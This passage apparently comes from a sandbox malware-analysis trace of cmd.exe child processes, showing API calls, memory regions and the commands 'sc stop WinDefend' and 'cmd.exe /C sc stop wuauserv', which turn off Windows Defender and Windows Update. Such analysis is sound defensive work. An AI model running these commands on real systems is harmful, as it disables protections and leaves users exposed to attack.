(_String1="sc", _String2="VER") returned -3 [0021.408] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0021.408] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0021.408] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0021.408] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0021.408] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0021.408] _wcsicmp (_String1="sc", _String2="START") returned -17 [0021.408] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0021.408] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0021.408] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0021.408] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0021.408] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0021.408] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0021.408] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0021.408] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0021.409] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0021.409] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0021.409] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0021.409] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0021.409] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0021.409] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0021.409] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0021.409] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0021.409] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0021.409] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0021.409] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0021.409] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0021.409] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0021.409] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0021.409] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0021.409] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0021.409] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0021.409] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0021.409] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0021.409] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0021.409] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0021.409] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0021.409] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0021.409] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0021.409] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0021.409] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0021.409] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0021.409] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0021.409] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0021.409] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0021.409] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0021.409] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0021.409] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0021.409] _wcsicmp (_String1="sc", _String2="START") returned -17 [0021.409] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0021.409] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0021.409] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0021.409] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0021.409] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0021.409] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0021.409] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0021.409] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0021.410] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0021.410] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0021.410] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0021.410] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0021.410] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0021.410] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0021.410] SetErrorMode (uMode=0x0) returned 0x0 [0021.410] SetErrorMode (uMode=0x1) returned 0x0 [0021.410] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5907f8, lpFilePart=0x28ee70 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28ee70*="Desktop") returned 0x25 [0021.410] SetErrorMode (uMode=0x0) returned 0x1 [0021.410] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0021.410] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0021.415] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0021.416] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0021.416] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x28ebec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ebec) returned 0xffffffff [0021.416] GetLastError () returned 0x2 [0021.416] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc", fInfoLevelId=0x1, lpFindFileData=0x28ebec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ebec) returned 0xffffffff [0021.416] GetLastError () returned 0x2 [0021.416] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0021.417] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x28ebec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ebec) returned 0x5a3460 [0021.417] FindClose (in: hFindFile=0x5a3460 | out: hFindFile=0x5a3460) returned 1 [0021.417] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x28ebec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ebec) returned 0xffffffff [0021.417] GetLastError () returned 0x2 [0021.417] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x28ebec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ebec) returned 0x5a3460 [0021.417] FindClose (in: hFindFile=0x5a3460 | out: hFindFile=0x5a3460) returned 1 [0021.417] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0021.417] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0021.417] GetConsoleTitleW (in: lpConsoleTitle=0x28f0e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0021.417] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ef6c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f034 | out: lpAttributeList=0x28ef6c, lpSize=0x28f034) returned 1 [0021.417] UpdateProcThreadAttribute (in: lpAttributeList=0x28ef6c, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f02c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ef6c, lpPreviousValue=0x0) returned 1 [0021.417] GetStartupInfoW (in: lpStartupInfo=0x28ef28 | out: lpStartupInfo=0x28ef28*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0021.418] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0021.419] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0021.419] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0021.419] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0021.419] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0021.419] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0021.421] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x28efc8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc stop WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f014 | out: lpCommandLine="sc stop WinDefend", lpProcessInformation=0x28f014*(hProcess=0x78, hThread=0x74, dwProcessId=0xb28, dwThreadId=0xb2c)) returned 1 [0021.522] CloseHandle (hObject=0x74) returned 1 [0021.522] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0021.522] GetEnvironmentStringsW () returned 0x5a5ef8* [0021.522] FreeEnvironmentStringsW (penv=0x5a5ef8) returned 1 [0021.522] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0021.867] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x28ef08 | out: lpExitCode=0x28ef08*=0x426) returned 1 [0021.868] CloseHandle (hObject=0x78) returned 1 [0021.868] _vsnwprintf (in: _Buffer=0x28f050, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ef14 | out: _Buffer="00000426") returned 8 [0021.868] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000426") returned 1 [0021.868] GetEnvironmentStringsW () returned 0x5a40b8* [0021.868] FreeEnvironmentStringsW (penv=0x5a40b8) returned 1 [0021.868] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0021.868] GetEnvironmentStringsW () returned 0x5a40b8* [0021.868] FreeEnvironmentStringsW (penv=0x5a40b8) returned 1 [0021.868] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ef6c | out: lpAttributeList=0x28ef6c) [0021.868] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.868] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0021.868] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.868] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0021.869] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.869] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0021.869] SetConsoleInputExeNameW () returned 0x1 [0021.869] GetConsoleOutputCP () returned 0x1b5 [0021.869] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.869] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.869] exit (_Code=1062) Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6445e000" os_pid = "0xa64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C sc stop wuauserv" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 438 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 439 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 440 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 441 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 442 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 443 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 444 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 445 start_va = 0x4a510000 end_va = 0x4a55bfff entry_point = 0x4a51829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 446 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 447 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 448 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 449 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 450 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 451 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 452 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 453 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 454 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 455 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 456 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 457 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 458 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 566 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 567 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 568 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 569 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 570 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 571 start_va = 0x74c80000 end_va = 0x74c86fff entry_point = 0x74c81230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 572 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 573 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 574 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 575 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 576 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 577 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 578 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 579 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 580 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 581 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 582 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 583 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 584 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 585 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 586 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 587 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 620 start_va = 0x4f0000 end_va = 0x677fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 621 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 622 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 643 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 644 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 645 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 646 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 647 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 648 start_va = 0x810000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 649 start_va = 0x1c10000 end_va = 0x1f52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 650 start_va = 0x1f60000 end_va = 0x222efff entry_point = 0x1f60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 23 os_tid = 0xa68 [0020.736] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34f7f4 | out: lpSystemTimeAsFileTime=0x34f7f4*(dwLowDateTime=0x13f963a0, dwHighDateTime=0x1d35d7b)) [0020.736] GetCurrentProcessId () returned 0xa64 [0020.736] GetCurrentThreadId () returned 0xa68 [0020.736] GetTickCount () returned 0x1450a [0020.736] QueryPerformanceCounter (in: lpPerformanceCount=0x34f7ec | out: lpPerformanceCount=0x34f7ec*=322408854) returned 1 [0020.738] GetModuleHandleA (lpModuleName=0x0) returned 0x4a510000 [0020.738] __set_app_type (_Type=0x1) [0020.738] __p__fmode () returned 0x76d831f4 [0020.739] __p__commode () returned 0x76d831fc [0020.739] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5321a6) returned 0x0 [0020.739] __getmainargs (in: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c, _DoWildCard=0, _StartInfo=0x4a534140 | out: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c) returned 0 [0020.739] GetCurrentThreadId () returned 0xa68 [0020.739] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa68) returned 0x60 [0020.739] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0020.739] GetProcAddress (hModule=0x76a20000, lpProcName="SetThreadUILanguage") returned 0x76a4a84f [0020.739] SetThreadUILanguage (LangId=0x0) returned 0x409 [0020.739] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0020.739] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x34f784 | out: phkResult=0x34f784*=0x0) returned 0x2 [0020.740] VirtualQuery (in: lpAddress=0x34f7bb, lpBuffer=0x34f754, dwLength=0x1c | out: lpBuffer=0x34f754*(BaseAddress=0x34f000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.740] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x34f754, dwLength=0x1c | out: lpBuffer=0x34f754*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0020.740] VirtualQuery (in: lpAddress=0x251000, lpBuffer=0x34f754, dwLength=0x1c | out: lpBuffer=0x34f754*(BaseAddress=0x251000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0020.740] VirtualQuery (in: lpAddress=0x253000, lpBuffer=0x34f754, dwLength=0x1c | out: lpBuffer=0x34f754*(BaseAddress=0x253000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.740] VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x34f754, dwLength=0x1c | out: lpBuffer=0x34f754*(BaseAddress=0x350000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, 